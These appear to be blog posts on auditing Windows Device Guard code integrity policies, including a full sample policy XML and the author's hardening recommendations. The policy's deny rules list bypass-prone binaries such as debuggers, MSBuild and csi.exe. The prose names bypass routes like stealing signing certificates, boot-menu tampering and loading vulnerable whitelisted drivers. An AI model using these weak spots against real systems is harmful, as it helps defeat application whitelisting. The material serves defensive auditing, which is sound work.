Description: Drivers must be Windows Hardware Quality Labs (WHQL) signed. Drivers signed with a WHQL certificate are indicated by a "Windows Hardware Driver Verification" EKU (1.3.6.1.4.1.311.10.3.5) in their certificate.
Operational impact: This will raise the bar on the quality (and arguably the trustworthiness) of the drivers that will be allowed to execute.
3) Disabled:Flight Signing
Description: Disable loading of flight signed code. These are used most commonly with Insider Preview builds of Windows. A flight signed binary/script is one that is signed by a Microsoft certificate and has the "Preview Build Signing" EKU (1.3.6.1.4.1.311.10.3.27) applied. Thanks to Alex Ionescu for confirming this.
Operational Impact: Preview build binaries/scripts will not be allowed to load. In other words, if you're on a WIP build, don't expect your OS to function properly.
4) Enabled:Unsigned System Integrity Policy
Description: If present, the code integrity policy does not have to be signed with a code signing certificate. The absence of this rule option indicates that the code integrity policy must be signed by a whitelisted signer as indicated in the UpdatePolicySigners section below.
Operational Impact: Once signed, deployed code integrity options can only be updated by signing a new policy with a whitelisted certificate. Even an admin cannot remove deployed, signed code integrity policies. If modifying and redeploying a signed code integrity policy is your goal, you will need to steal one of the whitelisted UpdatePolicySigners code signing certificates.
5) Required:EV Signers
Description: All drivers must be EV (extended validation) signed.
Operational Impact: This will likely not be present as most 3rd party and OEM drivers are not EV signed. Supposedly, Microsoft is mandating that all drivers be EV signed starting with Windows 10 Anniversary Update. From my observation, this does not appear to be the case.
6) Enabled:Advanced Boot Options Menu
Description: By default, with a code integrity policy deployed, the advanced boot options menu is disabled.
Operational Impact: With this option present, the menu is available to someone with physical access. There are additional concerns associated with physical access to a Device Guard enabled system. Such concerns may be covered in a future blog post.
7) Enabled:Boot Audit On Failure
Description: If a driver fails to load during the boot process due to an overly restrictive code integrity policy, the system will be placed into audit mode for that session.
Operational Impact: If you could somehow get a driver to fail to load during the boot process, Device Guard would cease to be enforced.
8) Disabled:Script Enforcement
Description: This is not actually documented but listed with 'Set-RuleOption -Help'. You would think that this actually does what it says but in practice it doesn't. Even with this set, PowerShell and WSH remain locked down.
Operational Impact: None. It is unlikely that you would see this in production anyway.

Undocumented and/or not not publicly exposed policy rules

The following policy rule options are undocumented and it is unclear if they are supported or not. As of this writing, you will likely never see these options in a deployed policy.
  • Enabled:Boot Menu Protection
  • Enabled:Inherit Default Policy
  • Allowed:Prerelease Signers
  • Allowed:Kits Signers
  • Allowed:Debug Policy Augmented
  • Allowed:UMCI Debug Options
  • Enabled:UMCI Cache Data Volumes
  • Allowed:SeQuerySigningPolicy Extension
  • Enabled:Filter Edited Boot Options
  • Disabled:UMCI USN 0 Protection
  • Disabled:Winload Debugging Mode Menu
  • Enabled:Strong Crypto For Code Integrity
  • Allowed:Non-Microsoft UEFI Applications For BitLocker
  • Enabled:Always Use Policy
  • Enabled:UMCI Trust USN 0
  • Disabled:UMCI Debug Options TCB Lowering
  • Enabled:Inherit Default Policy
  • Enabled:Secure Setting Policy


EKUs
This can consist of a list of Extended/Enhanced Key usages that can be applied to signers. When applied to a signer rule, the EKU in the certificate must be present in the certificate used to sign the binary/script.
EKU instances have a "Value" attribute consisting of an encoded OID. For example, if you want to enforce WHQL signing, the "Windows Hardware Driver Verification" EKU (1.3.6.1.4.1.311.10.3.5) would need to be applied to those drivers. When encoded the "Value" attribute would be "010A2B0601040182370A0305" (where the first byte which would normally be 0x06 (absolute OID) is replaced with 0x01). The OID encoding process is described here. ConvertTo-CIPolicy decodes and resolves the original FriendlyName attribute for encoded OID values.

FileRules
These are rules specific to individual files based either on its hash or based on its filename (not on disk but from the embedded PE resource) and file version (again, from the embedded PE resource). FileRules can consist of the following types: FileAttrib, Allow, Deny. File rules can apply to specific signers or signing scenarios.
FileAttrib
These are used to reflect a user or kernel PE filename and minimum file version number. These can be used to either explicitly allow or block binaries based on filename and version.
Allow
These typically consist of just a file hash and is used to override an explicit deny rule. In practice, it is unlikely that you will see an Allow file rule.
Deny
These typically consist of just a file hash and are used to override whitelist rules when you want to block trusted code by hash.

Signers
This section consists of all of the signing certificates that will be applied to rules in the signing scenario section. Each signer entry is required to have a CertRoot property where the Value attribute refers to the hash of the cbData blob of the certificate. The hashing algorithm used is dependent upon the hashing algorithm specified in the certificate. This hash serves as the unique identifier for the certificate. The CertRoot "Type" attribute will almost always be "TBS" (to be signed). The "WellKnown" type is also possible but will not be common.
The signer element can have any of the following optional child elements:
CertEKU
One or more EKUs from the EKU element described above can be applied here. Ultimately, this would constrain a whitelist rule to code signed with certificates with specific EKUs, "Windows Hardware Driver Verification" (WHQL) probably being the most common.
CertIssuer
I have personally not seen this in practice but this will likely contain the common name (CN) of the issuing certificate.
CertPublisher
This refers to the common name (CN) of the certificate. This element is associated with the "Publisher" file rule level.
CertOemID
This is often associated with driver signers. This will often have a third party vendor name associated with a driver signed with a "Microsoft Windows Third Party Component CA" certificate. If CertOemIDs were not specified for the "Microsoft Windows Third Party Component CA" signer, then you would implicitly be whitelisting all 3rd party drivers signed by Microsoft.
FileAttribRef
There may be one or more references to FileAttrib rules where the signer rules apply only to the files referenced.

SigningScenarios
When auditing Code Integrity policies, this is where you will want to start your audit and then work backwards. It contains all the enforcement rules for drivers and user mode code. Signing scenarios consist of a combination of the individual elements discussed previously. There will almost always be two Signing scenario elements present:
  1. <SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1"> - This scenario will consist of zero or more rules related to driver loading.
  2. <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS"> - This scenario will consist of zero or more rules related to user mode binaries, scripts, and MSIs.

Each signing scenario can have up to three subelements:
  1. ProductSigners - This will comprise all of the code integrity rules for drivers or user mode code depending upon the signing scenario.
  2. TestSigners - You will likely never encounter this. The purpose of this signing scenario is unclear.
  3. TestSigningSigners - You will likely never encounter this. The purpose of this signing scenario is unclear.

Each signers group (ProductSigners, TestSigners, or TestSigningSigners) may consist of any of the following subelements:
Allowed signers
These are the whitelisted signer rules. These will consist of one or more signer rules and optionally, one or more ExceptDenyRules which link to specific file rules making the signer rule conditional. In practice, ExceptDenyRules will likely not be present.
Denied signers
These are the blacklisted signer rules. These rules will always take priority over allow rules. These will consist of one or more signer rules and optionally, one or more ExceptAllowRules which link to specific file rules making the signer rule conditional. In practice, ExceptAllowRules will likely not be present.
FileRulesRef
These will consist of individual file allow or deny rules. For example, if there are individual files to be blocked by hash, such rules will be included here.

UpdatePolicySigners
If policy signing is required as indicated by the absence of the "Enabled:Unsigned System Integrity Policy" policy rule option, a deployed policy must be signed by the signers indicated here. The only way to modify a deployed policy in this case would be to resign the policy with one of these certificates. UpdatePolicySigners is updated using the Add-SignerRule cmdlet.
If a binary policy (SIPolicy.p7b) is signed, you can validate signature with Get-CIBinaryPolicyCertificate.

CISigners
These will consist of mirrored signing rules from the ID_SIGNINGSCENARIO_WINDOWS signing scenario. These are related to the trusting of signers and signing levels by the kernel. These are auto-generated and not configurable via the ConfigCI PowerShell module. These entries should not be modified.

HvciOptions
This specifies the configured hypervisor code integrity (HVCI) option. HVCI implements several kernel exploitation mitigations including W^X kernel memory and restricts the ability to allocate any executable memory for code that isn't explicitly whitelisted. Basically, HVCI allows for the system to continue to enforce code integrity even if the kernel is compromised. HVCI settings are configured using the Set-HVCIOptions cmdlet.
Any combination of the following values are accepted:
0 - Non configured
1 - Enabled
2 - Strict mode
4 - Debug mode
HVCI is not well documented as of this writing. Here are a few references to it:
Outside of Microsoft, Alex Ionescu and Rafal Wojtczuk are experts on this subject.

Settings
Settings may consist of one or more provider/value pairs. These options are referred to internally as  "Secure Settings". It is unclear the range of possible values that can be set here. The only entry you might see would be a PolicyInfo provider setting where a user can specify an explicit Name and Id for the code integrity policy which would be reflected in Microsoft-Windows-CodeIntegrity/Operational events. PolicyInfo settings can be set with the Set-CIPolicyIdInfo cmdlet.

Device Guard Code Integrity Policy Auditing Methodology

21 November 2016 at 13:57
In my previous blogpost, I provided a detailed reference of every component of a code integrity (CI) policy. In this post, I'd like to exercise that reference and perform an audit of a code integrity policy. We're going to analyze a policy that I had previously deployed to my Surface Pro 4 - final.xml.

<?xml version="1.0" encoding="utf-8"?>

<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">

  <VersionEx>10.0.0.0</VersionEx>

  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>

  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>

  <Rules>

    <Rule>

      <Option>Required:Enforce Store Applications</Option>

    </Rule>

    <Rule>

      <Option>Enabled:UMCI</Option>

    </Rule>

    <Rule>

      <Option>Disabled:Flight Signing</Option>

    </Rule>

    <Rule>

      <Option>Required:WHQL</Option>

    </Rule>

    <Rule>

      <Option>Enabled:Unsigned System Integrity Policy</Option>

    </Rule>

    <Rule>

      <Option>Enabled:Advanced Boot Options Menu</Option>

    </Rule>

  </Rules>

  <!--EKUS-->

  <EKUs />

  <!--File Rules-->

  <FileRules>

    <FileAttrib ID="ID_FILEATTRIB_F_1_0_0_1_0_0" FriendlyName="cdb.exe" FileName="CDB.Exe" MinimumFileVersion="99.0.0.0" />

    <FileAttrib ID="ID_FILEATTRIB_F_2_0_0_1_0_0" FriendlyName="kd.exe" FileName="kd.exe" MinimumFileVersion="99.0.0.0" />

    <FileAttrib ID="ID_FILEATTRIB_F_3_0_0_1_0_0" FriendlyName="windbg.exe" FileName="windbg.exe" MinimumFileVersion="99.0.0.0" />

    <FileAttrib ID="ID_FILEATTRIB_F_4_0_0_1_0_0" FriendlyName="MSBuild.exe" FileName="MSBuild.exe" MinimumFileVersion="99.0.0.0" />

    <FileAttrib ID="ID_FILEATTRIB_F_5_0_0_1_0_0" FriendlyName="csi.exe" FileName="csi.exe" MinimumFileVersion="99.0.0.0" />

  </FileRules>

  <!--Signers-->

  <Signers>

    <Signer ID="ID_SIGNER_S_1_0_0_0_0_0_0_0" Name="Microsoft Windows Production PCA 2011">

      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />

    </Signer>

    <Signer ID="ID_SIGNER_S_AE_0_0_0_0_0_0_0" Name="Intel External Basic Policy CA">

      <CertRoot Type="TBS" Value="53B052BA209C525233293274854B264BC0F68B73" />

    </Signer>

    <Signer ID="ID_SIGNER_S_AF_0_0_0_0_0_0_0" Name="Microsoft Windows Third Party Component CA 2012">

      <CertRoot Type="TBS" Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46" />

    </Signer>

    <Signer ID="ID_SIGNER_S_17C_0_0_0_0_0_0_0" Name="COMODO RSA Certification Authority">

      <CertRoot Type="TBS" Value="7CE102D63C57CB48F80A65D1A5E9B350A7A618482AA5A36775323CA933DDFCB00DEF83796A6340DEC5EBF7596CFD8E5D" />

    </Signer>

    <Signer ID="ID_SIGNER_S_18D_0_0_0_0_0_0_0" Name="Microsoft Code Signing PCA 2010">

      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195" />

    </Signer>

    <Signer ID="ID_SIGNER_S_2E0_0_0_0_0_0_0_0" Name="VeriSign Class 3 Code Signing 2010 CA">

      <CertRoot Type="TBS" Value="4843A82ED3B1F2BFBEE9671960E1940C942F688D" />

    </Signer>

    <Signer ID="ID_SIGNER_S_34C_0_0_0_0_0_0_0" Name="Microsoft Code Signing PCA">

      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE" />

    </Signer>

    <Signer ID="ID_SIGNER_S_34F_0_0_0_0_0_0_0" Name="Microsoft Code Signing PCA 2011">

      <CertRoot Type="TBS" Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E" />

    </Signer>

    <Signer ID="ID_SIGNER_S_37B_0_0_0_0_0_0_0" Name="Microsoft Root Certificate Authority">

      <CertRoot Type="TBS" Value="391BE92883D52509155BFEAE27B9BD340170B76B" />

    </Signer>

    <Signer ID="ID_SIGNER_S_485_0_0_0_0_0_0_0" Name="Microsoft Windows Verification PCA">

      <CertRoot Type="TBS" Value="265E5C02BDC19AA5394C2C3041FC2BD59774F918" />

    </Signer>

    <Signer ID="ID_SIGNER_S_1_1_0_0_0_0_0_0" Name="Microsoft Windows Production PCA 2011">

      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />

    </Signer>

    <Signer ID="ID_SIGNER_S_35C_1_0_0_0_0_0_0" Name="Microsoft Code Signing PCA">

      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE" />

    </Signer>

    <Signer ID="ID_SIGNER_S_35F_1_0_0_0_0_0_0" Name="Microsoft Code Signing PCA 2011">

      <CertRoot Type="TBS" Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E" />

    </Signer>

    <Signer ID="ID_SIGNER_S_1EA5_1_0_0_0_0_0_0" Name="Microsoft Code Signing PCA 2010">

      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195" />

    </Signer>

    <Signer ID="ID_SIGNER_S_2316_1_0_0_0_0_0_0" Name="Microsoft Windows Verification PCA">

      <CertRoot Type="TBS" Value="265E5C02BDC19AA5394C2C3041FC2BD59774F918" />

    </Signer>

    <Signer ID="ID_SIGNER_S_3D8C_1_0_0_0_0_0_0" Name="Microsoft Code Signing PCA">

      <CertRoot Type="TBS" Value="7251ADC0F732CF409EE462E335BB99544F2DD40F" />

    </Signer>

    <Signer ID="ID_SIGNER_S_4_1_0_0_0" Name="Matthew Graeber">

      <CertRoot Type="TBS" Value="B1554C5EEF15063880BB76B347F2215CDB5BBEFA1A0EBD8D8F216B6B93E8906A" />

    </Signer>

    <Signer ID="ID_SIGNER_S_1_1_0" Name="Intel External Basic Policy CA">

      <CertRoot Type="TBS" Value="53B052BA209C525233293274854B264BC0F68B73" />

      <CertPublisher Value="Intel(R) Intel_ICG" />

    </Signer>

    <Signer ID="ID_SIGNER_S_2_1_0" Name="Microsoft Windows Third Party Component CA 2012">

      <CertRoot Type="TBS" Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46" />

      <CertPublisher Value="Microsoft Windows Hardware Compatibility Publisher" />

    </Signer>

    <Signer ID="ID_SIGNER_S_19_1_0" Name="Intel External Basic Policy CA">

      <CertRoot Type="TBS" Value="53B052BA209C525233293274854B264BC0F68B73" />

      <CertPublisher Value="Intel(R) pGFX" />

    </Signer>

    <Signer ID="ID_SIGNER_S_20_1_0" Name="iKGF_AZSKGFDCS">

      <CertRoot Type="TBS" Value="32656594870EFFE75251652A99B906EDB92D6BB0" />

      <CertPublisher Value="IntelVPGSigning2016" />

    </Signer>

    <Signer ID="ID_SIGNER_S_4E_1_0" Name="Microsoft Windows Third Party Component CA 2012">

      <CertRoot Type="TBS" Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46" />

    </Signer>

    <Signer ID="ID_SIGNER_S_65_1_0" Name="VeriSign Class 3 Code Signing 2010 CA">

      <CertRoot Type="TBS" Value="4843A82ED3B1F2BFBEE9671960E1940C942F688D" />

      <CertPublisher Value="Logitech" />

    </Signer>

    <Signer ID="ID_SIGNER_S_5_1_0_0_0" Name="Matthew Graeber">

      <CertRoot Type="TBS" Value="B1554C5EEF15063880BB76B347F2215CDB5BBEFA1A0EBD8D8F216B6B93E8906A" />

    </Signer>

    <Signer ID="ID_SIGNER_F_1_0_0_1_0_0" Name="Microsoft Code Signing PCA">

      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE" />

      <CertPublisher Value="Microsoft Corporation" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_1_0_0_1_0_0" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_2_0_0_1_0_0" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_3_0_0_1_0_0" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_4_0_0_1_0_0" />

    </Signer>

    <Signer ID="ID_SIGNER_F_2_0_0_1_0_0" Name="Microsoft Code Signing PCA 2010">

      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195" />

      <CertPublisher Value="Microsoft Corporation" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_1_0_0_1_0_0" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_2_0_0_1_0_0" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_3_0_0_1_0_0" />

    </Signer>

    <Signer ID="ID_SIGNER_F_3_0_0_1_0_0" Name="Microsoft Code Signing PCA 2011">

      <CertRoot Type="TBS" Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E" />

      <CertPublisher Value="Microsoft Corporation" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_4_0_0_1_0_0" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_5_0_0_1_0_0" />

    </Signer>

    <Signer ID="ID_SIGNER_F_4_0_0_1_0_0" Name="Microsoft Windows Production PCA 2011">

      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />

      <CertPublisher Value="Microsoft Windows" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_4_0_0_1_0_0" />

    </Signer>

  </Signers>

  <!--Driver Signing Scenarios-->

  <SigningScenarios>

    <SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1" FriendlyName="Kernel-mode rules">

      <ProductSigners>

        <AllowedSigners>

          <AllowedSigner SignerId="ID_SIGNER_S_1_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_AE_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_AF_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_17C_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_18D_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_2E0_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_34C_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_34F_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_37B_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_485_0_0_0_0_0_0_0" />

        </AllowedSigners>

      </ProductSigners>

    </SigningScenario>

    <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS" FriendlyName="User-mode rules">

      <ProductSigners>

        <AllowedSigners>

          <AllowedSigner SignerId="ID_SIGNER_S_1_1_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_1_1_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_2_1_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_4_1_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_19_1_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_20_1_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_4E_1_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_65_1_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_35C_1_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_35F_1_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_1EA5_1_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_2316_1_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_3D8C_1_0_0_0_0_0_0" />

        </AllowedSigners>

        <DeniedSigners>

          <DeniedSigner SignerId="ID_SIGNER_F_1_0_0_1_0_0" />

          <DeniedSigner SignerId="ID_SIGNER_F_2_0_0_1_0_0" />

          <DeniedSigner SignerId="ID_SIGNER_F_3_0_0_1_0_0" />

          <DeniedSigner SignerId="ID_SIGNER_F_4_0_0_1_0_0" />

        </DeniedSigners>

      </ProductSigners>

    </SigningScenario>

  </SigningScenarios>

  <UpdatePolicySigners>

    <UpdatePolicySigner SignerId="ID_SIGNER_S_5_1_0_0_0" />

  </UpdatePolicySigners>

  <CiSigners>

    <CiSigner SignerId="ID_SIGNER_F_1_0_0_1_0_0" />

    <CiSigner SignerId="ID_SIGNER_F_2_0_0_1_0_0" />

    <CiSigner SignerId="ID_SIGNER_F_3_0_0_1_0_0" />

    <CiSigner SignerId="ID_SIGNER_F_4_0_0_1_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_1_1_0" />

    <CiSigner SignerId="ID_SIGNER_S_1_1_0_0_0_0_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_2_1_0" />

    <CiSigner SignerId="ID_SIGNER_S_4_1_0_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_19_1_0" />

    <CiSigner SignerId="ID_SIGNER_S_20_1_0" />

    <CiSigner SignerId="ID_SIGNER_S_4E_1_0" />

    <CiSigner SignerId="ID_SIGNER_S_65_1_0" />

    <CiSigner SignerId="ID_SIGNER_S_35C_1_0_0_0_0_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_35F_1_0_0_0_0_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_1EA5_1_0_0_0_0_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_2316_1_0_0_0_0_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_3D8C_1_0_0_0_0_0_0" />

  </CiSigners>

  <HvciOptions>1</HvciOptions>

</SiPolicy>


A code integrity policy is only as good as the way in which it was configured. The only way to verify its effectiveness is with a thorough understanding of the policy schema and the intended deployment scenario of the policy all through the lens of an attacker. The analysis that I present, while subjective, will be thorough and well thought out based on the information I've learned about code integrity policy enforcement. The extent of my knowledge is driven by my experience with Device Guard thus far, Microsoft's public documentation, the talks I've had with the Device Guard team, and what I've reversed engineered.

Hopefully, you'll have the luxury of being able to analyze an orignal CI policy containing all comments and attributes. In some situations, you may not be so lucky and may be forced to obtain an XML policy from a deployed binary policy - SIPolicy.p7b. Comments and some attribtues are stripped from binary policies. CI policy XML can be recovered with ConvertTo-CiPolicy.

Alright. Let's dive into the analysis now. When I audit a code integrity policy, I will start in the following order:
  1. Policy rule analysis
  2. SigningScenario analysis. Signing scenario rules are ultimately generated based on a combination of one or more file rule levels.
  3. UpdatePolicySigner analysis
  4. HvciOptions analysis

Policy Rule Analysis
Policy rules dictate the overall configuration of Device Guard. What will follow is a description of each rule and its implications.

1) Required:Enforce Store Applications

Description: The presence of this setting indicates that code integrity will also be applied to Windows Store/UWP apps.

Implications: It is unlikely that the absence of this rule would lead to a code integrity bypass scenario but in the off-chance an attacker attempted to deploy an unsigned UWP application, Device Guard would prevent it from loading. The actual implementation of this rule is unclear to me and warrants research. For example, if you launch modern calc (Calculator.exe), it is not actually signed. There’s obviously some other layer of enforcement occurring that I don’t currently comprehend.

Note: This rule option is not actually officially documented but it is accessible the Set-RuleOption cmdlet.

2) Enabled:UMCI

Description: The presence of this setting indicates that user mode code integrity is to be enforced. This means that all user-mode code (exe, dll, msi, js, vbs, PowerShell) is subject to enforcement. Compiled binaries (e.g. exe, dll, msi) not conformant to policy will outright fail to load. WSH scripts (JS and VBScript) not conformant to policy will be prevented from instantiating COM objects, and PowerShell scripts/modules not conformant to policy will be placed into Constrained Language mode. The absence of this rule implies that the code integrity policy will only apply to drivers.

Implications: Attackers will need to come armed with UMCI bpasses to circumvent this protection. Myself, along with Casey Smith (@subtee) and Matt Nelson (@enigma0x3) have been doing a lot of research lately in developing UMCI bypasses. To date, we’ve discussed some of these bypasses publicly. As of this writing, we also have several open cases with MSRC addressing many more UMCI issues. Our research has focused on discovering trusted binaries that allow us to execute unsigned code, Device Guard implementation flaws, and PowerShell Constrained Language mode bypasses. We hope to see fixes implemented for all the issues we reported.

Attackers seeking to circumvent Device Guard should be aware of UMCI bypasses as this is often the easiest way to circumvent a Device Guard deployment.

3) Required:WHQL

Description: All drivers must be WHQL signed as indicated by a "Windows Hardware Driver Verification" EKU (1.3.6.1.4.1.311.10.3.5) in their certificate.

Implications: This setting raises the bar for trust and integrity of the drivers that are allowed to load.

4) Disabled:Flight Signing

Description: Flight signed code will be prevented from loading. This should only affect the loading of Windows Insider Preview code.

Implications: It is recommended that this setting be enabled. This will preclude you from running Insider Preview builds, however. Flight signed code does not go through the rigorous testing that code for a general availability release would go through (I say so speculatively).

5) Enabled:Unsigned System Integrity Policy

Description: This setting indicates that Device Guard does not require that the code integrity policy be signed. Code Integrity policy signing is a very effective mitigation against CI policy tampering as it makes it so that only code signing certificates included in the UpdatePolicySigners section are authorized to make CI policy changes.

Implications: An attacker would need to steal one of the approved code signing certificates to make changes therefore, it is critical that that these code signing certificates be well protected. It should go without saying that the certificate used to sign a policy not be present on a system where the code integrity policy is deployed. More generally, no code signing certificates should be present on any Device Guard protected system that are whitelisted per policy.

6) Enabled:Advanced Boot Options Menu

Description: By default, with a code integrity policy deployed, the advanced boot options menu is disabled. The presence of this rule indicates that a user with physical access can access the menu.

Implications: An attacker with physical access will have the ability to remove deployed code integrity policies. If this is a realistic threat for you, then it is critical that BitLocker be deployed and a UEFI password be set. Additionally, since the “Enabled:Unsigned System Integrity Policy” option is set, an attacker could simply replace the existing, deployed code integrity policy with that of their own which permits their their code to execute.

Analysis/recommendations: Policy Rules


After thorough testing had been performed, it would be recommended to
  1. Remove "Enabled:Unsigned System Integrity Policy" and to sign the policy. This is an extremely effective way to prevent policy tampering.
  2. Remove "Enabled:Advanced Boot Options Menu". This is an effective mitigation against certain physical attacks.
  3. If possible, enable "Required:EV Signers". This is likely not possible however since it is likely that all required drivers will not be EV signed.

SigningScenario analysis

At this point, we’re interested in identifying what is whitelisted and what is blacklisted. The most efficient place to start is by analyzing the SigningScenarios section and working our way backwards.

There will only ever be at most two SigningScenarios:

  • ID_SIGNINGSCENARIO_DRIVERS_1 - these rules only apply to drivers
  • ID_SIGNINGSCENARIO_WINDOWS - these rules only apply to user mode code

ID_SIGNINGSCENARIO_DRIVERS_1


The following driver signers are whitelisted:

- ID_SIGNER_S_1_0_0_0_0_0_0_0
  Name: Microsoft Windows Production PCA 2011
  TBS: 4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146
- ID_SIGNER_S_AE_0_0_0_0_0_0_0
  Name: Intel External Basic Policy CA
  TBS: 53B052BA209C525233293274854B264BC0F68B73
- ID_SIGNER_S_AF_0_0_0_0_0_0_0
  Name: Microsoft Windows Third Party Component CA 2012
  TBS: CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46
- ID_SIGNER_S_17C_0_0_0_0_0_0_0
  Name: COMODO RSA Certification Authority
  TBS: 7CE102D63C57CB48F80A65D1A5E9B350A7A618482AA5A36775323CA933DDFCB00DEF83796A6340DEC5EBF7596CFD8E5D
- ID_SIGNER_S_18D_0_0_0_0_0_0_0
  Name: Microsoft Code Signing PCA 2010
  TBS: 121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195
- ID_SIGNER_S_2E0_0_0_0_0_0_0_0
  Name: VeriSign Class 3 Code Signing 2010 CA
  TBS: 4843A82ED3B1F2BFBEE9671960E1940C942F688D
- ID_SIGNER_S_34C_0_0_0_0_0_0_0
  Name: Microsoft Code Signing PCA
  TBS: 27543A3F7612DE2261C7228321722402F63A07DE
- ID_SIGNER_S_34F_0_0_0_0_0_0_0
  Name: Microsoft Code Signing PCA 2011
  TBS: F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E
- ID_SIGNER_S_37B_0_0_0_0_0_0_0
  Name: Microsoft Root Certificate Authority
  TBS: 391BE92883D52509155BFEAE27B9BD340170B76B
- ID_SIGNER_S_485_0_0_0_0_0_0_0
  Name: Microsoft Windows Verification PCA
  TBS: 265E5C02BDC19AA5394C2C3041FC2BD59774F918

TBS description:

The "Name" attribute is derived from the CN of the certificate. Ultimately, Device Guard doesn't validate the CN. In fact, the "Name" attribute is not present in a binary CI policy (i.e. SIPolicy.p7b). Rather, it validates the TBS (ToBeSigned) hash which is basically a hash of the certificate as dictated by the signature algorithm in the certificate (MD5, SHA1, SHA256, SHA384, SHA512). You can infer the hash algorithm used based on the length of the hash. If you're interested to learn how the hash is calculated, I recommend you load Microsoft.Config.CI.Commands.dll in a decompiler and inspect the Microsoft.SecureBoot.UserConfig.Helper.CalculateTBS method.

Signer hashing algorithms used:

SHA1:
 * Intel External Basic Policy CA
 * VeriSign Class 3 Code Signing 2010 CA
 * Microsoft Code Signing PCA
 * Microsoft Root Certificate Authority
 * Microsoft Windows Verification PCA

Note: Microsoft advises against using a SHA1 signature algorithm and is phasing the algorithm out for certificates. See https://aka.ms/sha1. It is likely within the realm of possibility that a non-state actor could generate a certificate with a SHA1 hash collision.

SHA256:
 * Microsoft Windows Production PCA 2011
 * Microsoft Windows Third Party Component CA 2012
 * Microsoft Code Signing PCA 2010
 * Microsoft Code Signing PCA 2011

SHA384:
 * COMODO RSA Certification Authority

Analysis/recommendations: Driver rules


Overall, I would say the the driver rules may be overly permissive. First of all, any driver signed with any of those certificates would be permitted to be loaded.  For example, I would imagine that most, if not all Intel drivers are signed with the same certificate. So, if there was a driver in particular that was vulnerable that had no business on your system, it could be loaded and exploited to gain unsigned kernel code execution. My recommendation for third party driver certificates is that you whitelist each individual required third party driver using the FilePublisher or preferably the WHQLFilePublisher (if the driver happens to be WHQL signed) file rule level. An added benefit of the FilePublisher rule is that the whitelisted driver will only load if the file version is equal or greater than what is specified. This means that if there is an older, known vulnerable version of the driver you need, the old version will not be authorized to load.

